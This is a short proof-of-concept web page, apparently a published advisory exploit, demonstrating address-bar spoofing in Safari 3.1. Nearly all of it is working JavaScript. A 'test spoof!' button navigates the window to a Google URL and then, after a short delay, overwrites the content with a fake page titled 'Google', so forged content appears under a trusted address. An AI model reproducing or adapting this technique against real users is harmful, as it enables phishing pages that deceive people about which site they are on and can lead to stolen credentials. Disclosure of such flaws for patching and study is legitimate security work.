<html>
Safari browser 3.1 (525.13) spoofing by Juan Pablo Lopez Yacubian
<html>
<head>
<title>Recipe 6.6</title>
<script type="text/javascript">
var newWindow;
function makeNewWindow() {
if (!newWindow || newWindow.closed) {
newWindow = window.open('http://www.google.com.ar/','_self');
setTimeout("writeToWindow()", 50);
} else if (newWindow.focus) {
newWindow.focus();
}
}
function writeToWindow() {
var newContent = "<html><head><title>Google</title></head>";
newContent += "<body>
<h1>FAKE PAGE</h1>";
newWindow.document.write(newContent);
newWindow.document.close();
}
</script>
</head>
<body>
<form>
<input type="button" value="test spoof!" onclick="makeNewWindow();"/>
</form>
</body>
</html>